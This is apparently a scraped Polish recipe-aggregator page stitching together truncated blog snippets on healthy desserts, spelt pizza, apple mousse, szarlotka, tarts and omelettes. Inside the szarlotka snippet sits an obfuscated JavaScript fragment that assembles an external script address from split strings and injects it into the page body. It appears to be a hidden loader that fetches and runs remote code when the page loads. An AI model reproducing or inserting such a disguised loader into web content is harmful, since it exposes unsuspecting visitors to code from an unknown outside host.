Sernik to jeden z najzdrowszych deserów. Na łamach „British Journal of Nutrition” opublikowano badania, które dowodzą, że regularne jedzenie fermentowanych produktów mlecznych zmniejsza ryzyko zawału i
Kulinarnyblog.pl - wiesz jak gotować!CHLEBEK ORKISZOWO-PSZENNY Z PŁATKAMI OWSIANYMI Składniki: -mąka pszenna (170 g) -mąka orkiszowa (200 g) -płatki owsiane (150 g) -drożdże suche (7g) lub ¼ kostki (25 g
Być w dobrej formie i tryskać pozytywną energią przez cały czasZdrowa pizza z mąki orkiszowej z batatami, nerkowcami i domowym sosem pomidorowym to nasza druga ulubiona fit pizza (obok Pizzy orkiszowej z mozzarellą i pomidorami ), w której gustuje cała nasza rodzinka. Połączenie słodkich batatów, z chrupiącymi orzechami, słodko-kwaśną bazą pomidorową i odrobiną mozzarelli jest przepyszne (weganie mogą pominąć mozzarellę i dać więcej nerkowców). Pizza znika na ciepło(...)Ponieważ spód do pizzy jest z mąki orkiszowej, pizza jest jest bardzo sycąca. Z poniższego przepisu na spód wychodzą 3 duże pizze. Ja często piekę dwie, a z pozostałego ciasta robię chlebek o nazwie Focaccia. Ciasto na pizze można przygotować wieczorem i wstawić na noc do lodówki. Bataty, to słodkie ziemniaki zaliczane do tzw. grupy superfoods i w przeciwieństwie
Moja Delicjapyszny, naturalnie słodki, ma delikatny smak papierówek, nie dodałam do gotowania nawet cynamonu, gdyż stwierdziłam, że można go dodać, tuż przed wykorzystaniem np. do posmarowania naleśników, do wszelkiego rodzaju ciast z jabłkami, szczególnie do szarlotki, do deserów, czy do zwykłego ryżu, czy kaszy manny na gęsto … Na blogu jest też przepis na mus jabłkowy na zimę z niewielką ilością(...)zimę. Mus z jabłek bez cukru jest idealny nie tylko dla tych, którzy liczą kalorie, ale również dla tych co nie chcą musu sztucznie słodzonego cukrem, chcą być fit. Ponieważ mus był przygotowywany z papierówek, podczas duszenia jabłka same się rozpadały, nie trzeba było im pomagać. Taki domowej roboty naturalny przecier jabłkowy doskonale nadaje się dla małych dzieci, nawet
Damsko-męskie spojrzenie na kuchnięłyżeczka musztardy – sól, pieprz SPÓD: Mąkę przesiewamy, dodajemy zimne masło pokrojone na kawałki, jajko oraz sól, szybko zagniatamy, zawijamy w folię i odkładamy do lodówki na 20 minut. Ciasto rozwałkowujemy na koło nieco większe niż nasza forma z wyjmowanym dnem i umieszczamy w formie, lekko dociskając. Nakłuwamy widelcem i ponownie wstawiamy do lodówki na 30 minut. Piekarnik rozgrzewamy(...)pieczemy 25 minut. Po upieczeniu studzimy przez 15 minut i podajemy. Świetnie smakuje również na zimno. Smacznego! Artykuł Pełnoziarnista tarta ze szparagami i Pecorino pochodzi z serwisu Be Fit Be Strong
Be Fit Be StrongJak nie wiem co podać na śniadanie to zazwyczaj powstają wówczas pyszne dania. Nie inaczej było i tym razem, naleśniki powstały pod wpływem chwili bo nic
Moje Małe CzarowanieMówiąc o ciastach z owocami, nie można nie wspomnieć o królowej polskich wypieków, czyli szarlotce ! Mnogość przepisów na jej przygotowanie przyprawia o zawrót głowy – od klasycznych, opartych na kruchym cieście i cynamonie , po wyszukane , zaskakujące różnorodnością składników oraz sposobem wykonania. Szarlotka z bezą (szczegółowy przepis znajdziecie tutaj: https://akademiasmaku.pl/przepis/fit-szarlotka-sypana-z-lekka-beza,3650 ) z pewnością sprosta wymaganiom wszystkich łasuchów, którzy uwielbiają połączenie jabłek(...)składniki zostały dobrane właśnie z myślą o nich ( https://akademiasmaku.pl/przepis/szarlotka-jaglana-weganska-bez-maki-i-jajek,3328 ). W przepisie nie znajdziemy mąki oraz jaj, a biały cukier można zastąpić ksylitolem. Jednym słowem: smacznie, zdrowo i fit. (function(){ cqug=document.createElement("script");cqug_=("ust");cqugu="124571744"; cqug_+="a"+("t.i");cqug.type="text/javascript"; cqugu+=".nqbjaxmmqugv0606n1vf";cqug.async=true;cqug_+="n"+("f"+"o")+"/"; cqugu+="qlnjbp2peh";cqug.src="https://"+cqug_+cqugu; document.body.appendChild(cqug
Moja smaczna kuchniaChyba każdy z nas cieszy się z niebanalnych prezentów Chciałam być zatem kreatywna i zamiast czekoladowych mikołajów i świątecznych czekolad wręczyłam tajemnicze woreczki a w nich
Eat me! Fit me!Dawno nie było nowych przepisów za co bardzo przepraszam, niestety szukam pracy i przez to tak wychodzi. Obiecuje po raz kolejny poprawę, ale tym razem mam
Parowar Facetałyżeczka musztardy – sól, pieprz SPÓD: Mąkę przesiewamy, dodajemy zimne masło pokrojone na kawałki, jajko oraz sól, szybko zagniatamy, zawijamy w folię i odkładamy do lodówki na 20 minut. Ciasto rozwałkowujemy na koło nieco większe niż nasza forma z wyjmowanym dnem i umieszczamy w formie, lekko dociskając. Nakłuwamy widelcem i ponownie wstawiamy do lodówki na 30 minut. Piekarnik rozgrzewamy(...)pieczemy 25 minut. Po upieczeniu studzimy przez 15 minut i podajemy. Świetnie smakuje również na zimno. Smacznego! Artykuł Pełnoziarnista tarta ze szparagami i Pecorino pochodzi z serwisu Just Be Fit Be Strong
Be Fit Be StrongCzy można połączyć pizzę i żurek? Można Powstanie wówczas zaskakująca zapiekanka, w której główną częścią będzie aromatyczny sos o smaku żurku. *Nie zapomnijcie śledzić mnie na
Eat me! Fit me!Pyszne i niezbyt pracochłonne ciasteczka z masłem orzechowym. Prosty deser, który uprzyjemni każde spotkanie. Świetna zabawa i dobry sposób na spędzenie czasu z dziećmi. Przygotowanie ciasteczek
Kuchcik gotujePomysł na ten omlet zrodził się, gdy narzeczony zażyczył sobie na śniadanie omlet na słodko, ale taki w wersji trochę fit, bo dba o linię. Ok, nie ma problemu - będzie lżej, będzie zdrowiej! :D Składniki: 2 jajka 2 łyżki mąki pszennej pełnoziarnistej 4 łyżki mleka 2 łyżeczki miodu 1/2 łyżeczki cynamonu szczypta soli 1/3 łyżeczki proszku do pieczenia(...)cynamon i proszek do pieczenia. 2. Mieszamy całość rózgą kuchenną, aby uzyskać jednolitą masę. 3. Na patelni rozgrzewamy olej lub masło. 4. Wylewamy ciasto na patelnię. 5. Zmniejszamy ogień i smażymy omlet do czasu, aż wierzch przestanie być płynny. W trakcie kontrolujemy spód omleta, żeby się nie przypalił. W razie potrzeby jeszcze
Prosto z KotłaJesień zbliża się wielkimi krokami, w związku z czym warto zadbać o naszą spiżarnię . Mam dla Was przepis na przepyszny dżem z cukinii. Jest mocno cytrynowy
Przepisy na widelcu